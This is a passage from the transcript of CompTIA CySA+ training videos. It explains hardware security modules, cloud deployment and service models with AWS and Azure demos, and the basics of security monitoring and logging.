and storing cryptographic secrets.
Objectives
recognize how HSMs are used for encryption offloading and the storage of cryptographic secrets
[Video description begins] Topic title: Hardware Security Module. The presenter is Dan Lachance. [Video
description ends]
A hardware security module or HSM provides protection and storage for cryptographic secrets at the hardware
or firmware level.
[Video description begins] Hardware Security Module (HSM). [Video description ends]
So it supports hardware crypto processing. This means that all of the key functionality for cryptographic keys,
things like generating keys and using keys for encryption and decryption, storing keys, creating digital
signatures or hashes. All of that type of crypto processing work can be handled by the hardware security
module. Now, this is a good thing because it offloads those tasks from a server that might otherwise be very
busy already. Now, HSMs are FIPS 140-2 compliant. This means that they are compliant with US government
security standards for cryptographic modules. Now, the hardware security module or HSM solution that you
decide to use, it's an external unit. It needs to be configured to work with your specific server operating system,
whether you're running Windows or a variation of Linux or AIX Unix or Solaris Unix.
So picture on the screen, we have a sense of where HSM falls into play in the overall ecosystem of an IT
computing environment. So let's say, for example, that we've got our server shown in the very bottom left here
that's got a Gigabit Ethernet connection to the HSM. So the HSM is another hardware appliance on the
network that's got to be connected to the server. And the HSM, in this case, might store and manage our
cryptographic keys. Now, those keys might be used to encrypt data at rest. Or they could be used for other
purposes. For example, users might make an HTTPS or VPN connection to a secured resource where the keys
that allow that HTTPS or VPN connection were generated by the HSM. Which, in turn, might allow for users
to replicate data securely to other locations for high availability. Which, in turn, allows for data access. So
hardware security modules then provide a lot of cryptographic services including key generation and
management.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So, in this course, we've examined securing hardware including firmware updating, device configuration,
SCADA, and IoT. We did this by exploring how to address mobile devices and IoT weaknesses. How to use
the shodan.io web site to examine lists of vulnerable devices. We looked at how to physically secure facilities
and computing equipment. And how vehicles and drones can present a potential security risk.
We talked about how SCADA is used for industrial device networks. Talked about BIOS and UEFI security
settings. How Self Encrypting Drives provide protection for data at rest. And the use of hardware security
modules, otherwise called HSMs. In our next course, we're going to move on to explore factors that an
organization should consider when using or migrating from on-premises environments to cloud environments,
including cloud deployment and service models.
CompTIA Cybersecurity Analyst+: Cloud Computing
These days, it's almost all about the cloud—public, private, hybrid, and community varieties—but how much
do you really know about these mysterious unseen dimensions? As more and more organizations use or
migrate on-premises IT systems and data into cloud environments, understanding the trendy concept has
become both necessary and increasingly complex. In this 12-video course, learners are exposed to the basics of
this new cloud world, including the four most popular cloud service models: Infrastructure as a Service (IaaS),
Platform as a Service (PaaS), Software as a Service (SaaS), and Infrastructure as Code. First, you will learn the
five primary characteristics of every cloud—resource pooling, self-provisioning, rapid elasticity, metered
usage, and broad access. Then examine each characteristic in more detail: learn how to determine when to use
a public, private, community, or hybrid cloud; how cloud service models delivered over a network are
categorized. The course helps to prepare learners for CompTIA+ Cybersecurity Analyst+ (CySA+) CS0-002
certification exam.
Table of Contents
Objectives
discover the key concepts covered in this course
[Video description begins] Topic Title: Course Overview [Video description ends]
Hi, I'm Dan Lachance. [Video description begins] Your host for this session is Dan Lachance. He is an IT
Trainer and Consultant [Video description ends]
I've worked in various IT roles since the early 1990s, including as a technical trainer, as a programmer, a
consultant, as well as an IT tech author and editor. I've held, and still hold, IT certifications related to Linux,
Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have included networking, IT
security, cloud solutions, Linux management and configuration, and troubleshooting across a wide array of
Microsoft products.
The CS0-002 CompTIA Cybersecurity Analyst or CySA+ Certification Exam is designed for IT professionals
looking to gain Security Analyst skills to perform data analysis, to identify vulnerabilities, threats, and risks to
an organization, to configure and use threat detection tools, and secure and protect an organization's
applications and systems. In this course, we're going to explore considerations when using or migrating to a
cloud environment, including cloud deployment models and service models.
I'll start by examining the characteristics of cloud computing, and how to determine when to use a public,
private, community, or hybrid cloud service. I'll then explore how cloud service models delivered over a
network are categorized. Next, I'll examine examples of the different cloud computing services, including
Infrastructure as a Service, Platform as a Service, Software as a Service, and Anything as a Service. Lastly, I'll
demonstrate how to deploy cloud resources using a JSON template.
After completing this video, you will be able to recognize the characteristics of cloud computing.
Objectives
[Video description begins] Topic Title: Cloud Computing Characteristics. Your host for this session is Dan
Lachance. [Video description ends]
Cloud computing is identified by 5 primary characteristics. They are resource pooling, self-provisioning, rapid
elasticity, metered usage, and broad access. Let's go through each of these cloud computing characteristics in a
bit more detail, starting with resource pooling. The Cloud Service Provider, or the CSP, provides the
underlying hardware infrastructure, starting at the property and the building or facility that houses all of the
data center equipment, like servers, network switches, storage arrays, backup devices, and so on.
Now, due to the economies of scale, and what that means is that, due to the fact that there are so many public
cloud customers, at least from a public cloud perspective, it means that the Cloud Service Provider can offer
the use of this infrastructure at a cheap price. Now, that's economies of scale. Now, that's in opposition to a
single organization paying upfront, in terms of a capital investment, for hardware that it needs, like servers and
storage arrays and network infrastructure. Another cloud computing characteristic is self-provisioning.
This allows quicker access to services because cloud customers don't have to, for example, submit a ticket to a
help desk before, let's say, a new virtual machine is deployed or more cloud storage space is allocated. The
self-provisioning can happen at the command line, so many public cloud providers will offer the ability to use
some kind of CLI, Command-Line Interface or PowerShell cmdlets to deploy and manage cloud resources.
And of course, there are GUI tools through web interfaces for the deployment and management of a cloud
environment.
The next characteristic is rapid elasticity. We're talking here about quick resource provisioning. So, one
example of this is horizontal scaling, scaling in and scaling out. What this means, for example, is with a load
balancer, either manually or in an automated fashion, having a load balancer automatically add virtual machine
instances, that's scaling out, to support a busy application workload, or when things quiet down, to save on
costs, removing virtual machine instances because they're not needed. And that would be scaling in.
There's also vertical scaling, scaling up and down. Scaling up would be, for instance, looking at an existing
virtual machine and determining it doesn't have enough horsepower, so maybe increasing the number of virtual
CPUs or the amount of RAM it supports. Scaling down, of course, means reducing those items when they're
not needed for the workload running in the virtual machine. Naturally, the more horsepower, the more cost.
Then, there's metered usage, kind of like a utility, like water or electricity. In the cloud, this is called pay-as-
you-go. Basically, as a cloud customer, monthly charges are based on resource consumption, so the more
virtual machines or databases you have deployed and up and running, the more storage space you're using in
the cloud, the more you pay.
So it's important, then, to save on costs by shutting down or disabling or removing cloud resources that you are
not using. Broad access is the next cloud computing characteristic. It allows accessibility to services over a
network, whether that's a private network, because you could have a private cloud only available and used by a
single organization. Of course, you could also have a public cloud environment where users could access
software over the Internet, such as using Gmail, for example. That's an example of a cloud service. There's also
devices like IoT devices and manufacturing robotic devices, laptops, tablets, and smartphones that can be used
to access cloud services over a network.
In this video, learn how to determine when to use public cloud services.
Objectives
determine when public cloud services should be used
[Video description begins] Topic Title: Public Cloud. Your host for this session is Dan Lachance. [Video
description ends]
In order for a cybersecurity analyst to properly assess risk and mitigate the impact of realized threats in a cloud
environment, there needs to be an understanding of cloud computing and the different types of cloud models.
A public cloud environment is accessible to Internet users, anybody that wishes to sign up with an account.
And so, public cloud providers have worldwide geographic locations. They have a presence with their data
centers in many different parts of the world.
Now, this is usually a moving target. It's usually changing all of the time as public cloud providers expand
around the globe. So the cloud provider, then, is responsible for the hardware in their data centers around the
world that allow cloud services to be a reality. And they are also responsible for ensuring tenant isolation. A
tenant is a cloud computing customer. And so, two organizations that might subscribe to a public cloud
provider are kept completely separate from one another at every level. So you don't have one tenant that can
see the configuration or data of another cloud tenant.
Then, there's regulatory compliance. Most public cloud providers will provide documentation as to which
security standards and regulations that their services are compliant with. But the thing to bear in mind is that,
just because a cloud provider like Microsoft Azure, or maybe it's Amazon Web Services, it could be any cloud
provider, just because they're compliant with PCI DSS for credit card holder information doesn't mean that
automatically you are, no matter how you use the cloud services. So some of the onus for compliance falls on
you, the cloud customer.
The other thing to think about with clouds is Service Level Agreements or SLAs. These are documents that
guarantee a level of service for a specific cloud service, whether it's storage, virtual machines, databases, and
so on. So, SLAs are a unique per cloud service offering. There is a split responsibility, depending on which
service is being used in a public cloud. For example, if technicians in your organization are deploying virtual
machines in the public cloud, it is their responsibility to maintain the configuration of those VMs and to apply
operating system patches and maybe even app software patches, if app software is installed.
But the underlying responsibility for the hypervisor, or the physical equipment that supports those virtual
machines, that's the responsibility of the Cloud Service Provider. The other thing to bear in mind is that, with
the public cloud, some service offerings might vary from one region to another. So just because a new fancy
cloud service is available in the American West doesn't necessarily mean it's available in Central Canada or in
Western Europe.
Public cloud providers serve as a form of risk transference. It's essentially outsourcing. We're outsourcing
some level of the risk associated with IT services to a 3rd party. Now, a 3rd party, of course, is the public
cloud provider. So we need to think, then, about the security of how we are getting to the public cloud, our
network link. Are we using a VPN or a dedicated circuit or just connecting straight over the Internet?
Now, when you're connecting straight over the Internet without a VPN, most cloud services are still protected
using HTTPS. Common public cloud providers around the world include Google Cloud Platform, IBM Cloud,
Microsoft Azure, Alibaba Cloud Computing, especially prevalent in China, and Amazon Web Services.
[Video description begins] Topic Title: Private Cloud. Your host for this session is Dan Lachance. [Video
description ends]
There are times when an organization or a government agency wants complete and entire control of an IT
infrastructure. And that's where private clouds can come in. Private clouds are accessible only to a single
organization, so it's organization-owned hardware.
However, it still adheres to all cloud characteristics, meaning self-provisioning, rapid elasticity, broad access,
metered usage, and so on. So all of those things are still in effect because otherwise, it wouldn't be called a
cloud environment. So often, departmental chargeback is used within an organization. Because one of the
cloud characteristics is metered usage, or pay-as-you-go, that means the usage of cloud resources, so be it
virtual machines or some kind of software being used over the network or storage, whatever the case might be,
it is tracked per department, or maybe even project.
And so, what this means, then, is, on a monthly basis, for example, each department or project within the
organization is billed for the amount of resources they used in the private cloud, and they must pay it to the
central authority controlling it, such as the IT department. Private clouds are interesting also, in that, because
all of the control is in the hands of a single entity, so a single organization or government agency, that also
means all of the responsibility falls on them In some cases, for regulatory compliance reasons, the use of a
private cloud might be mandated.
All of the security controls that address any potential threats are internal, and they are fully controlled by the
organization. So private clouds work best when an organization or government agency, I guess we could say
an entity, requires full and complete control and has exclusive use of that cloud computing infrastructure.
[Video description begins] Topic Title: Community Cloud. Your host for this session is Dan Lachance. [Video
description ends]
A community cloud is a cloud deployment model that serves customers with the same types of needs, in terms
of their IT computing services, so, same needs across multiple cloud tenants or customers. And those
requirements might be related to sensitive data encryption. They might have to use an isolated type of
community cloud environment for regulatory compliance, isolated meaning not anyone in the public can just
sign up and have access to that cloud environment.
It might be required, for example, that the management of data centers for that cloud is done by people of a
certain nationality, such as by US persons. Or, it might be something that has to be compliant with certain
security standards, like the Federal Risk and Authorization Management Program, or FedRAMP, in the United
States for government agencies.
Now, government clouds are available with the larger public cloud providers. These government clouds use
physically isolated data centers, meaning isolation from data centers that the general public could sign up for
and access services from. One example would be some of the standards required by the Department of Justice,
so DOJ CJIS in the United States. CJIS stands for Criminal Justice Information Systems Security.
So government clouds would have to be compliant with the standards set out by DOJ CJIS in order for
government agencies dealing with the criminal justice information to use a cloud environment. There's also
FIPS 140-2 compliance. The Federal Information Processing Standard, or FIPS, is a US government standard
that specifies the strength of cryptographic modules that are used to secure data.
And of course, we mentioned FedRAMP compliance. FedRAMP, the Federal Risk and Authorization
Management Program, is a standardized way to apply security to IT systems, such as those being used in the
cloud.
[Video description begins] Topic Title: Hybrid Cloud. Your host for this session is Dan Lachance. [Video
description ends]
A hybrid cloud combines multiple cloud models. For instance, you might have a hybrid cloud environment if
you are migrating on-premises systems and data into a cloud environment. And that can take time, and so, you
might have a hybrid cloud that exists only during the migration phase, or you might keep it up and running for
synchronization purposes over the long term. So, examples.
You've got data stored on-premises and you replicate it into the cloud. You might also have a hardware VPN
solution linking your on-premises network to a cloud VPN, so that you've got an encrypted tunnel through
which you can synchronize data and access cloud resources, and it's kept secure. Another thing to think about
is the use of public and private cloud services. This is an example of a hybrid cloud environment, as well as the
use of on-premises services. So it could be any combination of these types of things that constitutes a hybrid
cloud.
Hybrid clouds are often found when you're running parallel systems running on-premises and in the public
cloud. This could be for migration purposes, as we've already identified, but also, it could be used for a disaster
recovery-type of solution, where you've enabled failover. If the on-premises solutions fails, it fails over into
the cloud. So we've already mentioned that you can also replicate on-premises data into the cloud.
Now, this can be done on a continuous basis, or you essentially could have an on-premises virtual machine that
appears as a backup appliance, or a backup target. And so, on-premises systems might back up to this on-
premises backup target, which, in turn, replicates to the cloud, which allows you to have off-site storage.
recognize how self-provisioned, metered elastic services delivered over a network are categorized
[Video description begins] Topic Title: Cloud Service Models. Your host for this session is Dan
Lachance. [Video description ends]
We already know that there are a number of cloud deployment models. We've got public clouds, private
clouds, community clouds, and hybrid clouds. But within each, we also have cloud service models, how IT
solutions are made available to different sets of users, depending on needs. First of all, we have to cover
Anything as a Service or X-a-a-S. This is broad term that references running IT solutions or accessing them
over a network where it's actually being run on equipment elsewhere.
So, this really correlates to a specific type of cloud service, whether we're talking about running virtual
machines in the cloud, running databases, running websites, using cloud storage, or even using software
developer tools in the cloud. Infrastructure as a Service, or IaaS, deals with compute infrastructure, things like
virtual machines, or using cloud storage, or defining any type of cloud virtual network configuration.
So configuring virtual networks and subnets and IP address ranges, configuring route tables and firewall ACL
rules in the cloud, all of this constitutes Infrastructure as a Service. Platform as a Service, or PaaS, is normally
applied to software developers, not specifically, but most often. It allows for the deployment of databases as
managed services.
Now, a managed service means that you don't have to deal with the underlying technical complexities. In the
case of a database managed service, it means we can simply, for example in a GUI, with a few clicks, define
that we want a MySQL database deployment with this kind of horsepower, go. And we don't have to worry
about manually setting up the underlying virtual machines, and manually installing the database software, and
so on. Search facilities are also another part of Platform as a Service that would be useful for developers.
Again, it's a managed service, where there's a quick configuration for developers to enable things like
searching through indexes, that might apply to web applications hosted in the cloud. There's cluster-based
processing, so having clusters of computers working together to solve problems, such as big data analytics.
And there's also many different types of programming components that software developers can deploy in the
cloud in what's called a serverless architecture, serverless meaning, well, there's a server running in the
backend at some level, but not that the developer knows about, and nor are they responsible for it.
So, if a developer wants to start defining custom APIs, Application Programming Interfaces, in the cloud, it's
very quick and easy to do, without the developer having to set up a server to host it. Same with dealing with
message queues to allow different software components to communicate with one another. This can be done
very easily in the cloud, without the developer having to set up a server to host it in the first place. It's a
managed service. Then, we have Software as a Service, or S-a-a-S. This is generally thought of as end-user
productivity software, which is correct. It also includes things like cloud storage user interface tools.
Now, you might say, "Well, I thought cloud storage was Infrastructure as a Service." Well, it is, depending on
who's configuring and using it. If an individual user is using Dropbox or Microsoft OneDrive or Google Drive,
that is also configured by that user, and it's also considered to be Software as a Service. They're accessing
some kind of end-user productivity services over a network, so they can store things like Office productivity
files. Things like cloud-based email, Software as a Service, and any other type of office productivity tools, like
spreadsheets, word processors, presentation software, and so on.
After completing this video, you will be able to provide examples of IaaS.
Objectives
[Video description begins] Topic Title: Infrastructure as a Service. Your host for this session is Dan
Lachance. [Video description ends]
Infrastructure as a Service, or I-a-a-S, always called IaaS, is the infrastructure that we would normally have
even on-premises to support IT computing processes, so things like storage, things like networking, things like
having servers up and running to support mission-critical workloads. So, here in the Amazon Web Services
cloud, I've already signed in with my account to the "AWS Management Console" GUI.
So, as an example of some Infrastructure as a Service that we might deploy here in the cloud through self-
service provisioning, I'm going to search up "VPC". "VPC" in Amazon Web Services stands for Virtual
Private Cloud. In other words, it's a virtual network that you define in the cloud with IPv4 or IPv6 support.
So, for example, I'm going to go to "Your VPCs". I already have one, but I'm going to create another one with
the "Create VPC" button. I'm going to call it "VPC2", and I'm going to assign it an IPv4 CIDR block. In this
case, how about we choose "12.0.0.0/16". So the 1st 2 octets, or 1st 2 bytes, so "12.0." identify our network
range. The "Tenancy" here is going to be "Default". I don't need "Dedicated" underlying hardware from
Amazon Web Services to support this. I'm going to leave it on "Default Tenancy", and I'll click "Create". And
then I'll close out. So now I've got "VPC2".
Now, normally, the next part of the infrastructure I would define would be a subnet within that range,
"12.0.0.0/16". So I'm going to go to "Subnets", and I'm going to click "Create subnet". And this is going to be
called "VPC2_Subnet1". Going to tie it, of course, to what we just created, "VPC2". And we can see the
"CIDR" range here, so I'm going to go ahead. Now, that's for the VPC. I'm going to go ahead and specify
"12.0", let's say, ".1.0/24". So the subnet range needs to fall within the network range. And these are network
addresses, not individual host addresses. So I'm going to go ahead and click "Create". We now have a subnet.
So we can see "VPC2_Subnet1" and we can see the "CIDR" range listed there for it. I'm going to go back to
the main part of the AWS Console here. We can also work with storage. Here, that would be "S3", Simple
Storage Service here at Amazon Web Services, where you can create what's called a storage bucket. There's a
"Create bucket" button. And this allows you, if I were to open up one of these buckets, to store any data you
want in the cloud environment. You can "Upload" existing files, or store new ones in here, and you can enable
things like encryption and so on.
And finally, another example, common example of cloud Infrastructure as a Service would be virtual
machines. In AWS, that's called "EC2", Elastic Cloud Compute. These are virtual servers or virtual machines
in the cloud. So, I'm going to go into "EC2", and I'm going to go into the "Instances" view. An EC2 instance is
a cloud-based virtual machine. We can see there are some here already. I want to deploy another one into my
newly-created VPC subnet. So I'll click "Launch Instance".
From here, I have to choose an image, whether it's Linux, or whether it's Windows-based. So maybe I'll choose
"Windows Server 2019 64-Bit". And as I scroll through this config, I can determine the vertical scaling. So the
instance "Type" determines the number of virtual CPUs, the amount of RAM, and actually, the more
horsepower, the more cost. I'm just going to accept a lot of the defaults here, but I do want to make sure, on
"Step 3", that I put this in in "VPC2_Subnet1".
Now, I can also determine whether I want a "Public IP" address for this instance, so I'm just going to make
sure that that is disabled, and then I'm going to click "Next". I can add additional storage devices. And finally,
on "Next", I'll add a tag here called "Name". I'm going to call it "WinSrv2019-2". That's not the Windows
operating system hostname, that's just a name here that we'll see it listed as in the Amazon Web Services GUI.
The "security group", I'm going to choose an existing one here. This controls the traffic that's allowed into and
out of the virtual machine instance. And then, when I go to "Launch" this, I'm going to select an existing "key
pair" here that I've already defined, and acknowledge that I have the private key part, which is required for me
to decrypt the admin password to authenticate to the instance. I'm going to go ahead and choose "Launch
Instance", and I'll click on the instance ID link that's provided here, and we can see that our virtual machine
instance is now in the midst of starting up.
So we can see that the "Instance State" is "running", the operating system's still "Initializing". Down below,
there's no "Public IP" for the selected instance because I disabled that, but it does have a "Private IP". Now, if
it did have a "Public IP", and you wanted to connect directly to it over the Internet, you could select that virtual
machine and choose "Connect". And from here, when you click "Get Password", you would have to make sure
the server was up and running, it's not fully initialized, and then, you'd have to specify your private key to
decrypt the password.
[Video description begins] Topic Title: Platform as a Service. Your host for this session is Dan
Lachance. [Video description ends]
In the cloud, Platform as a Service, or PaaS, P-a-a-S, is normally of interest primarily to software developers. It
allows them to quickly deploy code solutions for software development or databases very quickly, without
having to provision the underlying servers and all the software that needs to be installed to make those things
happen.
So, as an example, here in Amazon Web Services, if I were to search for the word "code", then I have a lot of
developer tools available here, such as "CodeBuild", "CodeCommit", "CodeDeploy", "CodePipeline",
"CodeStar", and so on. And if I search for "RDS" for "Relational Database Service", I'll click on that, we have
a quick and easy way to deploy a variety of different types of database solutions, which would be of very big
interest for developers, so they don't have to worry about provisioning the underlying servers and installing the
database software, and so on.
So, I'm going to go ahead and click on "Create database", and in this case, I'll choose "Easy Create". Let's say
it's "MySQL", but notice the different types of database engines available. It's quite the selection for just a few
clicks. "MySQL", "PostgreSQL", "Oracle", "Microsoft SQL Server", and so on. I'm going to select the "Free
tier" here down below, just for testing purposes. It's going to call the database instance "database-1".
I just really need to specify the admin password here, so let me go ahead and do that and confirm it. And
because I've selected the "Easy create" option, I can see what that means, in terms of default configurations, so
"Encryption" is "Enabled". I can see the "VPC" or cloud network that's being deployed into the "Database
Port", that's the standard MYSQL listening port, 3306. I'm okay with all of that, so I'm just going to go ahead
and click "Create database".
And we can now see that we are in the midst of creating a database. Under the "Status" column, it says
"Creating". Now, how easy is that? With just a few clicks and a few seconds, you can start deploying a
relational database with minimal effort. And that's the type of thing that we can experience when working with
Platform as a Service in a cloud environment. Now, I can click on that database link at any point in time to
check out some performance metrics, and also to take a look at the configuration of it, and optionally, make
changes if I want to.
Now, because it's still in the midst of being created, the "Modify" button is unavailable, it's grayed out. But
we'll be able to make any changes that we deem appropriate here, including, if I go back here and select the
radio button for the database, we can even go to the "Actions" button and "Create read replica"s, so that we
might have another replica in another location for high availability, or for a heavy read operation against the
contents of the database. The beauty is, it's minimal effort, maximum results.
After completing this video, you will be able to provide examples of SaaS.
Objectives
[Video description begins] Topic Title: Software as a Service. Your host for this session is Dan
Lachance. [Video description ends]
In cloud computing parlance, Software as a Service, S-a-a-S, otherwise called SaaS, comes in many different
forms. I've chosen to use Office 365, where I've signed in with my account. And we can see that we have a
number of different offerings, essentially software that's made available for end users over a network, in this
case, over the Internet.
I don't have to worry, as a cloud customer here, about the underlying server hardware, and whether there's
enough RAM or enough storage space or how the network is configured, and so on. All I do is use this
software over a network, in this case, using a web browser interface. It doesn't get more convenient than that.
So for example, if I want to click on "OneDrive" and start taking a look at any cloud storage, I can start to
work with that. Or, if I want to go check my "Outlook" email or use Microsoft "Word" so I can start building
documents here in the cloud, and even working with them and sharing them with other cloud users. The same
would be true if I'm working in Microsoft "Excel". I can work with spreadsheets directly here in the cloud by
clicking "New blank workbook". All of this within a web browser accessing the service over a network,
specifically Software as a Service.
Now, the responsibility of the underlying infrastructure, of course, falls upon the Cloud Service Provider, in
this case Microsoft. But the use of Software as a Service solutions and securing the resultant data, such as
sensitive spreadsheet files, the security of that would fall upon myself, the cloud tenant, cloud customer, cloud
user, whichever term you would prefer to use.
So, there is a shared responsibility, then, at the Software as a Service level, where we are responsibile for
securing the result of using S-a-a-S solutions, while the Cloud Service Provider is responsible for the
underlying infrastructure and its availability.
[Video description begins] Topic Title: Infrastructure as Code. Your host for this session is Dan
Lachance. [Video description ends]
Infrastructure as Code is a term that is used to refer to the fact that we can use code, in other words, syntax in a
text file, whether it's XML or JSON, that has the instructions to deploy or manage cloud resources. And so,
we're going to take a look at how that gets done in a Microsoft Azure cloud environment. We've already got an
Azure account, and I've already signed in to the Azure portal, so I'm going to click "Create a" new "resource".
What I want to create here is a template deployment. In other words, I want to deploy resources from a
template. So, I'm going to search for the word "template", and I'm going to choose "Template deployment".
Now, from here, we're going to have a number of options after we click the "Create" button. We can select
from some very standard and common templates, such as to "Create a Linux virtual machine", "a Windows
virtual machine", "a web app"lication, "a SQL database". We can even "Build" our "own template in the
editor".
It opens up with an editor here, where we've got the basic foundation here in JSON format, that's JavaScript
Object Notation, J-S-O-N, where we can add the appropriate code here to deploy different types of Microsoft
Azure cloud resources, and also maybe pass parameters in, so that we can reuse the templates, and we haven't
hard-coded things like virtual machine names or subnet IP address ranges. However, I'm going to "Discard"
this. We can also choose one of these existing common templates, such as to "Create a Linux virtual machine".
Now, you might wonder, "How is this different than just deploying a Linux virtual machine in this interface
anyways?" It's very simplified. Depending on the template you choose, you'll only be asked to supply a few
pieces of information. So, there's not very much here, it's all on one page, so that's the purpose of doing that.
However, I don't want to use this template, so I'm just going to go back to the "template deployment" part. So
I'm going to go back, and basically, I'm going to create a new template deployment, because what we're going
to take a look at is that you can refer to a variety of template repositories out there on the Internet.
So, I'll just search up "template deployment", we'll pop that up once again, click "Create". And this time, down
at the bottom, I'm interested in the "GitHub quickstart template"s that we can refer to. So I can click in there
and then "Type to start filtering". Well, that's interesting. Okay, so I'm going to type in the word "web", and
from here, we can start seeing some of the result of that. So I want a "webapp" that runs on a "basic linux"
deployment.
So if I select that template, we can then "Select" or "Edit" the template, I'm going to select it as it is, to start
deploying items. It just needs a few pieces of information, such as the "Resource group" that I want to deploy
these resources into. Select one I already have called "RG1", and I can specify the "Web App Name", and so
on, as we go further down through the list.
But really, one of the beauties of templates is that they could potentially require minimal information before
quickly deploying the resources. I'm going to choose "I agree to the terms and conditions", and I'm going to
choose "Purchase". And at this point, we can see the deployment is currently in progress. I can click on that
link from the notification to kind of track what's being deployed and I'll know when it's ready to go.
Objectives
[Video description begins] Topic Title: Course Summary. Your host for this session is Dan Lachance. [Video
description ends]
So, in this course, we've examined what an organization should consider when using or migrating their on-
premises IT systems and data to a cloud environment, including the various cloud deployment models and
service models that are available.
We did this by exploring the characteristics of cloud computing, how to determine when to use a public,
private, community, or hybrid cloud, how cloud service models delivered over a network are categorized. We
looked at examples of cloud computing services, such as Infrastructure as a Service, Platform as a Service,
Software as a Service, and we talked about how generally, these are all referred to as Anything as a Service, X-
a-a-S.
We also looked at how to deploy cloud resources using a JSON template, which is referred to as Infrastructure
as Code. In our next course, we'll move on to explore threat monitoring and how centralized monitoring
solutions can be used to help identify suspicious activity and also to help reduce business disruptions and
reduce response time to incidents.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus comp TIA and Microsoft. Some of my specialties over the years have included
networking, IT security, cloud solutions, Linux management, and configuration, and troubleshooting across a
wide array of Microsoft products. The CS0-002 Comp TIA cybersecurity analyst or SYSA plus certification
exam is designed for IT professionals looking to gain security analyst skills, perform data analysis to identify
vulnerabilities, threats and risks to an organization. To configure and use threat detection tools, and secure and
protect an organization's applications and systems.
In this course, we're going to explore threat monitoring, including the use of centralized monitoring solutions
for identifying suspicious activity and reducing response time. I'll start by examining the relationship between
continuous monitoring and quick security incident response time and I'll explore the relevance of the various
common log types. I'll then demonstrate how to view cloud-based audit events and how to send Linux log
events to a centralized logging host. Next, I'll show how to perform Windows event log filtering. Then I'll
demonstrate how to configure cloud based alarms. I'll continue with an examination of how the OSI model
layers relate to communications hardware and software. And I'll explore what to watch for when analyzing
network traffic and an email ecosystem. Lastly, I'll explore where to use honey pots to monitor malicious
activity, how SIAM provides centralized security, event monitoring and management. And how to identify
suspicious activity by filtering out noise
In this video, find out how to link continuous monitoring with quick security incident response times.
Objectives
[Video description begins] Topic title: Continuous Monitoring. The presenter is Dan Lachance. [Video
description ends]
The continuous monitoring of IT solutions is directly related to quick security incident response times. So
continuous monitoring is very important when it comes to security. We're talking about the monitoring of both
on-premises resources like servers, and irregular network activity, that type of thing, as well as monitoring
cloud resources. And many public cloud providers have centralized monitoring solutions which collectively
are referred to as monitoring as a service, or MaaS.
Monitoring means looking at things like performance metrics, such as server availability over the network,
CPU utilization, disk IO metrics. Database cache, hit ratios and so on. Availability, making sure that a service
is reachable. And security-related events, such as failed connections or failed login attempts. So all of this is
related to performance. And performance is an important part of monitoring. Not only to make sure that things
are running efficiently, but an abnormal performance byte can also be indicative of some kind of a security
compromise. So monitoring is useful for proper resource governance. To determine the efficacy of
implemented security controls. Are they effective in mitigating risk? It's also important for accountability, so
we can determine which service software component, or which user performed a specific action against a
resource. And then we might require monitoring to ensure legal and regulatory compliance.
Continuous monitoring deals with the time it takes to detect a logged security event. Obviously, less is better.
Now, having a delayed incident response is bad. Again, that's kind of obvious. But in 2016, based on reported
security incidents, the average delayed incident response time was 191 days. Not seconds, minutes, or hours,
days. This means that there was quite a lot of prevalence of advanced persistent threats, where compromised
hosts or networks were compromised for extended periods of time. But why is this? Well, it usually means that
there is not some kind of a proper security baseline that's looking for abnormal activity. Or could mean that
updates to firmware and software are not being applied as quickly as possible when they're made available. So
continuous monitoring will help with this. It lets us detect suspicious activity and breaches by looking at things
like abnormal performance spikes for CPU utilization or the amount of network traffic. But you can only
decide what's abnormal when you first know what is normal. So you have to establish security and
performance baselines for continuous monitoring to be effective.
The next thing to think about is logging and behavioral analysis. Now, you can enable logging at many
different levels. So you could have logging for a custom application. Or for the operating system or
commercial off-the-shelf, or COTS, software. Either way, logs need to be reviewed, otherwise what's the
purpose of having them? Now, that can be done manually, but in a larger enterprise, that just doesn't make
sense. Instead, having automated tools, intrusion detection systems that look into logs, looking for suspicious
activity or specific items can be helpful. Setting up log alerts, so that we might get alerted when specific types
of events occur and are written to a log file. A lack of auditing is a problem, if we're not auditing things like
access to applications or files.
[Video description begins] Auditing should also be done for failed login attempts. [Video description ends]
Behavioral analysis is also important. We refer to this as user and entity behavior analytics, otherwise called
UEBA, U-E-B-A. In essence, we're talking about detecting suspicious or abnormal host and network activity.
We already know we need a baseline of what's normal for that to be possible. So looking at performance, such
as excessive outbound traffic at a certain time of the day when that normally doesn't happen. Or a CPU that's
overly busy when in the past it hasn't been. Now that could be legitimate. It could be in response to an increase
in demand for an app. Or it simply could be malware that's infected a host it's performing cryptomining for
cryptocurrencies.
There are different types of continuous monitoring when you dive into the details, such as URL analysis. So
looking at whether or not we might have incoming messages that constitute email phishing scams. And maybe
even comparing incoming messages and strings to known problems or blacklisted URLs. There's DNS
analysis, where perhaps we could analyze network traffic to look at any DNS queries for specific types of
services. That might indicate, for example, that a piece of software is unable to register with the central
authority, perhaps because a PKI certificate has expired.
Now that might be very difficult to track down, other than analyzing DNS traffic where you'll see traffic trying
to go to a DNS name that implies software registration. Then there's standard network traffic flow analysis
using tools like Wireshark. And then a trend analysis. Trend analysis is very important, it's a general term. But
in the case of IT, what we're looking at doing is taking historical information and trying to identify patterns.
And there are a lot of monitoring tools that will do this for you. And by doing this, you can even let that serve
you in terms of defining a security and performance baseline.
3. Video: Log Types (it_cscysa20_08_enus_03)
After completing this video, you will be able to describe the relevance of common log types.
Objectives
[Video description begins] Topic title: Log Types. The presenter is Dan Lachance. [Video description ends]
Logging and monitoring is one corner of IT management that doesn't quite get the attention it deserves.
It might not be considered as exciting as deploying new resources like virtual machines, but it is so important
for the cybersecurity analyst. One of the reasons why is because it relates to our Incident Response Plan. You
won't know a security incident has occurred, therefore the IRP will not be put into motion if you don't know
that something happened by monitoring or reviewing logs.
It's also important to think about access control for logs. Which entities? Which users have the ability to view
logs? Which software entities have the ability to write to logs? It's also important in an enterprise to have
centralized logging and monitoring. One of the reasons is speed. If we can expedite the review of logs, looking
for anomalies and then doing something about it, then we are in a better security position than if we have to
manually reach out to individual hosts and app servers and cloud services looking for anomalies.
Centralization is key. Periodic testing of various types, including penetration testing, can be very important. So
that we can easily identify any deficiencies that might exist with logging and monitoring. For example, a pen
test team might discover that it's very easy to break into a file server where logs are being stored in an
